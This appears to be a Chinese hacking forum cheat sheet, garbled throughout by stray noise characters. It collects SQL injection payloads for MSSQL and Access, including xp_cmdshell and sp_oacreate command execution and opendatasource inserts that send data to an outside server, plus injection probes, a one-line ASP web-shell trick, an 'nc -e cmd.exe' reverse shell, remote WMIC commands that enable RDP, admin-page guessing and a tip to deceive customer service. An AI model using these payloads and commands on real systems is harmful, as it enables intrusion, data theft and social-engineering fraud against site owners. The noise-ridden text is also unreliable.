SA点数据库分离技术相关. f7 [$ @6 m7 N
2 C' F% T9 l; i, n, ^0 z
2 p! l& z6 R7 H
SA点数据库分离搞法+语句:
, z2 |3 n2 w" `$ B5 F1 i7 E' p( m( v) }3 H
注射点不显错,执行下面三条语句页面都返回正常。
4 B' Z( {$ T+ v; H7 E$ N* Iand 1=(select count(*) FROM master.dbo.sysobjects where name= 'xp_regread')2 {1 A! H/ p$ Y3 H/ x1 W! O7 e' A, j
and 1=(select count(*) FROM master.dbo.sysobjects where name= 'sp_makewebtask')4 e* m+ y; G8 {1 k# ~" W7 }
and 1=(select count(*) FROM master.dbo.sysobjects where xtype = 'X' AND name = 'xp_cmdshell')
6 @) g. k8 s7 j1 X8 n可以列目录,判断系统为2000,web与数据库分离
9 r) G4 w6 Y$ G; f遇到这种情况首先要想办法得到数据库IP来进行下一步得渗透了。3 O: f2 N' [3 X4 Q
在注射点上执行% R3 ?& o/ k( ?& b7 h `) a( S
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd /c net user ';--' R( k' Z- F% S9 K
页面返回正常,通过上面这个命令执行telnet我一个外网肉鸡得1433端口,然后netstat/an没有得到IP
0 e" N' M- r5 B* u1 Q$ I1 T3 @3 q还有我用NC监听得其他端口都没有得到IP。
- f# N5 ]0 y" Q( Y8 x* u/ D
# n: R% F) m, l3 r通过注射点执行下面这两个命令页面都返回异常,在肉鸡上面同样也是没有得到IP。
( {) O1 F$ h: G, n. y+ O1 x/ @'insert into opendatasource('sqloledb','server=xxx.xxx.xxx.xxx;uid=sasa;pwd=sasa;database=tempdb').tempdb.dbo.temp select name from master.dbo.sysdatabases--
0 w* Q. O" r2 |6 H
0 B: ]5 N3 X! g/ _- ~& o8 j;insert into OPENROWSET('SQLOLEDB','uid=sa;pwd=pass;Network=DBMSSOCN;Address=xxx.xxx.xxx.xxx,1433;', 'select * from dest_table') select * from src_table;--2 E! f/ I2 A9 S$ V$ R: o8 G+ b
9 o' r3 e% l, O7 u; {1 V4 D现在就猜想是不是数据库是内网而且不能连外网。% O( @7 v$ {+ C
: Y1 g" d% R( Q+ A8 N/ G% ~0 Z0 I- F, g+ d9 C; H
access导出txt文本代码
: c4 c; L2 g1 e+ ~SELECT * into [test.txt] in 'd:\web\' 'text;' from admin
2 C3 I/ G' C! \" }1 F- G6 i- _# e+ ]) V; s$ F& c" ]% ^
1 \2 O+ x. D; Q# N( K. A/ w2 W7 Q
9 J. y% r2 I% A* z. L& I自动跳转到指定网站代码头
6 i9 y6 B# P3 S# D( `<body onload='vbscript:document.links(0).href="http://www.google.com":document.links(0).innerHTML="www.sohu.com"'>
/ |! k/ F! ~6 r" N3 G" Z
- y# b& R( b3 p2 L: m6 q/ T7 S- g
* w$ z, s5 ?9 f5 R1 Q g# Z2 a% G$ y入侵java or jsp站点时默认配置文件路径:3 s' K/ t8 y0 z; K5 k" a
\web-inf\web.xml
3 ~7 v- R- f$ O, i& ktomcat下的配置文件位置:0 ]6 f& A( x. d* S% r1 [% B3 g9 `
\conf\server.xml (前面加上tomcat路径)
0 y, ~, V0 h; f8 Y$ O1 ~4 T8 M\Tomcat 5.0\webapps\root\web-inf\struts-config.xml" b( E8 ~4 k8 ?7 F! S
2 ]; d- p2 t4 y" C: l
2 v' T$ k9 U2 c: K
0 Q5 W& V* E& i! l6 C5 i检测注入点新方法运算符法,在过滤了and or cookies时用比有效果:
' ^, t9 D, S* D+ j-1%23
0 I8 C" ^4 z6 g- O3 e5 W>
4 a4 y6 k. |1 D! S4 J9 q& ]<6 Y3 F$ q* `( X. ~0 {2 I
1'+or+'1'='1- q1 Q! N: f E. E! r/ G
id=8%bf+ p, B! g3 N; w# h$ H; A
% a8 w( C. V) W5 I% B
全新注入点检测试法:7 E& r, z, J* o: p
在URL地址后面加上-1,URL变成:http://gzkb.goomoo.cn/news.asp?id=123-1,如果返回的页面和前面不同,是另一则新闻,则表示有注入漏洞,是数字型的注入漏洞;在 URL地址后面加上 -0,URL变成 http://gzkb.goomoo.cn/news.asp?id=123-0,返回的页面和前面的页面相同,加上-1,返回错误页面,则也表示存在注入漏洞,是数字型的。2 T/ Q c# d5 X; z% }% }4 U
& \% q/ S1 y1 [5 [1 |
在URL的地址后面加上'%2B',URL地址变为:http://gzkb.goomoo.cn/news.asp?id=123'%2B',返回的页面和1同;加上'2%2B'asdf,URL地址变为:http://gzkb.goomoo.cn/news.asp?id=123'%2Basdf,返回的页面和1不同,或者说未发现该条记录,或者错误,则表示存在注入点,是文本型的。* j7 a! l" _& O
, V- h f! ]# I9 Y( q9 _ T搜索型注入判断方法:
: d! t0 r' X9 E6 `( F北京%' and '1'='1' and '%'='
, ^7 j4 |9 C4 h1 ]0 @' p$ ]北京%' and '1'='2' and '%'='. F; q- ?! W$ l* y( z N
. g0 ^3 U+ b! D! ]# J; C9 p" c5 X. a& X: E' {2 U. I) U
COOKIES注入:- P( l m% m' w( A
* m. T$ B2 T! W7 vjavascript:alert(document.cookie="id="+escape("51 and 1=1"));
+ v, v: ^2 p5 n, L L6 U$ \7 J1 s2 |1 F6 o
2000专业版查看本地登录用户命令:
9 J3 s- S0 h# @ f( d! Lnet config workstation6 |' X/ S+ B( T
: _: F, p+ Z! H( `8 m
3 R# I) ]; d/ a8 E2003下查看ipsec配置和默认防火墙配置命令:
3 v+ d5 ?8 b9 I' X& Pnetsh firewall show config% m$ _- Y' X& O5 K' F- X
netsh ipsec static show all! }6 b5 j5 i3 x: t' L
4 \' D; M/ i$ z* Z! t& s: x不指派指定策略命令:7 K! j- o5 y( Y8 x9 {
netsh ipsec static set policy name=test assign=n (test是不指派的策略名)2 ~4 q$ X! f$ ^5 O; }7 m1 y9 ^; h
netsh ipsec static show policy all 显示策略名% R$ O0 D) e& e0 q) S
5 @2 @6 f: M; b, c6 l& f; V! T# q2 {0 U3 U3 j+ v) C
猜管理员后台小技巧:0 w/ G1 I$ E( @
admin/left.asp 3 \+ |, O8 B. |' j2 v8 m5 J, z# h
admin/main.asp* l n+ Y$ [% D E# |7 R9 A7 Z3 \
admin/top.asp' ~: z) _/ j% C4 T- d& r0 j5 V
admin/admin.asp
0 {! b, \/ G# u: B2 v" c会现出菜单导航,然后迅雷下载全部链接
4 W' D% c9 p3 C8 Z5 {; L
& |1 h( J+ d+ x; y$ s# X4 T$ u! H* t+ @) G: ~& J* c9 H
社会工程学:( R7 M5 B* E9 W
用这个查信息 http://tool.chinaz.com/ Whois查域名注册人和维护人
6 p& H# K5 q& I0 ~然后去骗客服
8 O( J- I1 w) L" T* q: ?/ d
5 L% L9 E" T" M4 | }4 k- i* j+ k4 P9 B: e& _9 i3 E
统计系统使用的是IT学习者的统计系统,在网上下载了一套回来研究。这样的系统拿webshell一般就二种:1.数据库插一句话木马,客户端连接得到。2.网站配置页面写入木马代码拿webshell。打开数据库目录,发现数据库扩展名是asp的,默认路径:data/#ITlearner.asp,把数据库扩展名改成*.mdb,用明小子的数据库工具打开,发现有防下载的表。管理员的默认密码是:ITlearner。数据库插一句话木马这条路是走不通了,现在只有看第二种方法看行不。输入默认密码进入 http://www.cnc-XX.com/admin/cutecounter /admin.asp?action=ShowConfig,查看原代码:
8 z9 W8 v7 G7 z查找 修改maxlength="3"为maxlength="100">这里是为了突破固定长度的字符输入。然后查找 处 修改为action="http://www.cnc-XX.com/admin/cutecounter/admin?Action=SaveConfig">, ! @$ h1 V1 A4 x( O S' ? S$ e! p
存为html文件打开后在最后详细来访信息记录多少条记录,默认为100条框输入100:eval request(chr(35)),点击保存。提示无法找到,结果发现。' h& F1 o7 K. l3 S8 b7 m: k$ o! k" D
5 A* c' `0 f$ [5 O) _
0 c: t' [5 g- F- z# A8 {6 X, U
; s0 U( X; }. R9 x/ q' w$ T2 ]6. 554端口 用real554.exe入侵。 6129端口 用dameware6129.exe入侵。 系统漏洞 利用135、445端口,用ms03026、ms03039、ms03049、ms04011漏洞, 进行溢出入侵。 3127等端口 可以利用doom病毒开的端口,用nodoom.exe入侵。(可用mydoomscan.exe查)
" p$ F$ D2 q6 A* o6 I7 w2 t5 |# ? ^5 @1 V3 D3 j) j5 _
# z; }) h/ d' ?1 d, @; ^* T& Z+ L* G
' U! W1 G7 S3 X9 u' ~2 V, C, ACMD加密注册表位置
' _5 c; P& ~5 i0 d6 O(1)HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor- |6 I h0 @% i r+ u, x
AutoRun1 n3 r: Z: [: g
0 Z2 _. {* t+ O7 k/ j5 ^1 z. l(2)HKEY_CURRENT_USER\Software\Microsoft\Command Processor5 t$ q" u+ P. p$ r' I
AutoRun
8 h& r$ @! n6 b; L; y" o7 i% O; q4 B [" Q% W0 u' i8 b
7 R$ [8 `' d) l- E, [* I
在找注入时搜索Hidden,把他改成test
: _+ z# a# _( B+ b
2 l# ?- ?/ h: X$ K# E1 e: w5 m
$ V$ [" i# H ?, E y: n* W7 j7 R b3 A B$ J
mstsc /v:IP /console & e S y# U3 ?. f5 S6 f
$ c0 Q" ]+ S6 ]8 W2 b( B' G
+ O$ y6 B9 j" L5 M+ f: J0 G- ]
一句话开3389:) C- s* [2 `# r! g
3 e# I% m6 K* A. G' H: H最近我在网上看到新出了一种方法,一句话开3389,不过好像听说只能用于2003系统,唉,还是写出来和大家分享一下吧.很简单的,wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1 adh=Kp e!w 8 kw`=wSH> . n+ m1 s$ @; e, B5 _6 \6 c% e$ R8 Y
开远程:WMIC /node:"远程机器名" /user:"administrator" /password:"lcx" RDTOGGLE WHERE ServerName='远程机器名' call SetAllowTSConnections 1 就是这样了,其实还有其他的一些方法开2003的3389,我这里也不多作介绍了,大家有空上网一查就知道了.; O$ M. [: V0 b5 `
1 a% b& X6 P5 F
- E- P4 o( l7 d6 Y, h# A% r知道表名,字段,使用SQL语句在ACCESS数据库中加个用户名及密码语句如下:* y5 T' [1 V7 B# n0 m
Insert into admin(user,pwd) values('test','test')2 [/ ^% f0 X3 L
& s2 d( j5 r7 n% n: K( }
) o8 y+ D" e* R$ N1 ZNC反弹
\4 \3 d; D }4 r9 b先在本机执行: nc -vv -lp 监听的端口 (自己执行) % f' t1 ^" c" g! ^: p7 e* `" M
然后在服务器上执行: nc -e cmd.exe 自己的IP 和监听的端口 (对方执行)
" h# B& s- r- y+ Z G8 b& h4 r% C5 S. k" I+ F
8 r6 b( I! D+ b) i$ M% ~. S& J1 I在脚本入侵过程中要经常常试用%00来确认下参数是否有问题
M8 M3 Y2 n8 ^( M$ E* a
9 V& y$ a9 f9 b7 M. X2 [0 K有时候我们入侵的时候,在webshell没有办法列举网站的目录包括dir也不行的时候,这个时候可以尝试用DOS命令SUBST转移目录& B$ @; n! o2 X2 R7 h& R# f, F' q+ W
例如:1 ?: A8 J, n# j0 y8 w: E
subst k: d:\www\ 用d盘www目录替代k盘
* B! f2 `# i8 M2 b1 E, @; p8 Nsubst k: /d 解除K盘代替 |